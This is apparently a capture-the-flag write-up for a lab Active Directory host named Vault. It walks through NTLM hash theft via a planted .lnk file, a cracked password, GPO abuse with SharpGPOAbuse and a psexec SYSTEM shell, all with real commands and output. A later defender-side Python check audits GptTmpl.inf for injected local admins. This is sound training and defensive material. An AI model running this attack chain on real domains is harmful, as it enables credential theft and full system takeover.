
Vault 🔺

Enumeration

RID brute-forcing (--rid force) gives us the domain users and groups.

There is a writable share, DocumentsShare, so we can drop a .lnk file (generated with ntlm_theft) that points at our SMB server to capture NTLM hashes.

Cracking the captured hash with hashcat yields the credentials:

anirudh:SecureHM

Initial Access

Get the flag

Privilege Escalation

Using bloodhound-python we notice that the user has WriteDacl permissions.

We can use SharpGPOAbuse.exe to add ourselves to the local Administrators group:

*Evil-WinRM* PS C:\Users\anirudh\Documents> ./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
[+] Domain = vault.offsec
[+] Domain Controller = DC.vault.offsec
[+] Distinguished Name = CN=Policies,CN=System,DC=vault,DC=offsec
[+] SID Value of anirudh = S-1-5-21-537427935-490066102-1511301751-1103
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
*Evil-WinRM* PS C:\Users\anirudh\Documents> 
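Defender-side check, added here and not part of the original walkthrough: the edit above lands in the GPO's GptTmpl.inf as a Restricted Groups entry, so auditing that file on SYSVOL (alongside alerting on GPT.ini version bumps) catches the change before the refresh cycle applies it. The sample template, its layout, and the Domain Admins allow-list are assumptions for the example.

```python
import re

# Well-known SID (and name) of the built-in local Administrators group.
LOCAL_ADMINS = {"S-1-5-32-544", "Administrators"}

# Constructed sample of a GptTmpl.inf Restricted Groups section in the shape an
# --AddLocalAdmin edit leaves behind; the member SID is the one from the session above.
SAMPLE_GPTTMPL = """[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-537427935-490066102-1511301751-1103
"""

SECTION_RE = re.compile(r"^\[(.+)\]$")
MEMBERS_RE = re.compile(r"^\*?(?P<group>[^=]+?)__Members\s*=\s*(?P<members>.*)$", re.I)

def decode_gpttmpl(data: bytes) -> str:
    # GptTmpl.inf on SYSVOL is normally UTF-16LE with a BOM; fall back to UTF-8.
    if data.startswith(b"\xff\xfe"):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")

def parse_restricted_groups(text: str) -> dict:
    """Return {group: [member identifiers]} from the [Group Membership] section."""
    groups, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        sec = SECTION_RE.match(line)
        if sec:
            in_section = sec.group(1).strip().lower() == "group membership"
            continue
        if not in_section or not line:
            continue
        m = MEMBERS_RE.match(line)
        if m:
            members = [p.strip().lstrip("*") for p in m.group("members").split(",")]
            groups[m.group("group").strip()] = [p for p in members if p]
    return groups

def unexpected_local_admins(text: str, allowed: set) -> list:
    """Identifiers the GPO pushes into local Administrators that are not on the allow-list."""
    found = set()
    for group, members in parse_restricted_groups(text).items():
        if group in LOCAL_ADMINS:
            found.update(members)
    return sorted(found - set(allowed))
```

Run it over every Policies\{GUID}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf on SYSVOL with your known-good allow-list; any SID it reports is a membership change that deserves a look at who last wrote the GPO.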

Re-enter with psexec and

$ python3 /usr/share/doc/python3-impacket/examples/psexec.py vault.offsec/anirudh:SecureHM@192.168.120.116
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 192.168.120.116.....
[*] Found writable share ADMIN$
[*] Uploading file WGPlQkwE.exe
[*] Opening SVCManager on 192.168.120.116.....
[*] Creating service LVYv on 192.168.120.116.....
[*] Starting service LVYv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

Post Exploitation

Get the flag